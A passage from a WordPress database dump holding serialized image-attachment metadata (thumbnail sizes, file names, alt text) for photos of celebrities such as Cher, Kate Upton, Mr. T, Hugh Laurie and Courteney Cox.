ile\";s:16:\"Cher-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:16:\"Cher-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:16:\"Cher-696x465.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:16:\"Cher-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:16:\"Cher-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:16:\"Cher-628x420.jpg\";s:5:\"width\";i:628;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(516,104,'_wp_attachment_image_alt','Cher'),(517,63,'_thumbnail_id','104'),(521,106,'_wp_attached_file','2015/06/Kate-Upton.jpg'),(522,106,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:450;s:4:\"file\";s:22:\"2015/06/Kate-Upton.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Kate-Upton-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Kate-Upton-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-534x450.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-696x392.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:392;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-741x450.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Kate-Upton-747x420.jpg\";s:5:\"width\";i:747;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(523,106,'_wp_attachment_image_alt','Kate Upton'),(524,64,'_thumbnail_id','106'),(526,107,'_wp_attached_file','2015/05/Mr.-T.jpg'),(527,107,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2015/05/Mr.-T.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Mr.-T-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Mr.-T-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Mr.-T-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:15:\"Mr.-T-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:16:\"Mr.-T-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:17:\"Mr.-T-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:17:\"Mr.-T-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:17:\"Mr.-T-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:17:\"Mr.-T-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:17:\"Mr.-T-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:17:\"Mr.-T-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:17:\"Mr.-T-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:17:\"Mr.-T-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:17:\"Mr.-T-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:17:\"Mr.-T-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:17:\"Mr.-T-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:17:\"Mr.-T-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:17:\"Mr.-T-800x580.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:17:\"Mr.-T-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(528,107,'_wp_attachment_image_alt','Mr. T'),(529,65,'_thumbnail_id','107'),(531,108,'_wp_attached_file','2015/06/Hugh-Laurie.jpg'),(532,108,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:23:\"2015/06/Hugh-Laurie.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"Hugh-Laurie-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"Hugh-Laurie-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"Hugh-Laurie-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:12:\"Getty Images\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:179:\"LOS ANGELES - OCTOBER 6: Actor Hugh Laurie talks at the Four Seasons Hotel on October 6, 2006 in Los Angeles, California. (Photo by Piyal Hosain/Fotos International/Getty Images)\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:24:\"2006 Fotos International\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:28:\"Hugh Laurie Portrait Session\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:18:{i:0;s:13:\"72397710|Hand\";i:1;s:2:\"On\";i:2;s:13:\"Chin|Portrait\";i:3;s:14:\"Portraits|Pose\";i:4;s:5:\"Poses\";i:5;s:14:\"Posing|Gesture\";i:6;s:8:\"Gestures\";i:7;s:15:\"Gesturing|Hands\";i:8;s:14:\"Gesturing|Hand\";i:9;s:7:\"Gesture\";i:10;s:4:\"Hand\";i:11;s:21:\"Gestures|Hairy|Facial\";i:12;s:8:\"Hair|Two\";i:13;s:3:\"Day\";i:14;s:14:\"Beard|Unshaven\";i:15;s:8:\"Unshaven\";i:16;s:16:\"Face|Beard|Hairy\";i:17;s:4:\"Face\";}}}'),(533,108,'_wp_attachment_image_alt','Hugh Laurie'),(534,66,'_thumbnail_id','108'),(536,109,'_wp_attached_file','2015/05/Santana-Garrett.jpg'),(537,109,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:532;s:4:\"file\";s:27:\"2015/05/Santana-Garrett.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Santana-Garrett-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Santana-Garrett-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-696x463.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Santana-Garrett-632x420.jpg\";s:5:\"width\";i:632;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(538,109,'_wp_attachment_image_alt','Santana Garrett'),(539,67,'_thumbnail_id','109'),(541,110,'_wp_attached_file','2015/06/Jim-Nabors.jpg'),(542,110,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2015/06/Jim-Nabors.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Jim-Nabors-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Jim-Nabors-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-640x486.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-640x580.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Jim-Nabors-420x420.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(543,110,'_wp_attachment_image_alt','Jim Nabors'),(544,69,'_thumbnail_id','110'),(546,111,'_wp_attached_file','2015/06/Courteney-Cox.jpg'),(547,111,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2015/06/Courteney-Cox.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Courteney-Cox-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Courteney-Cox-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-480x261.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-480x462.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-480x385.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-480x486.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-480x580.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Courteney-Cox-315x420.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(548,111,'_wp_attachment_image_alt','Courteney 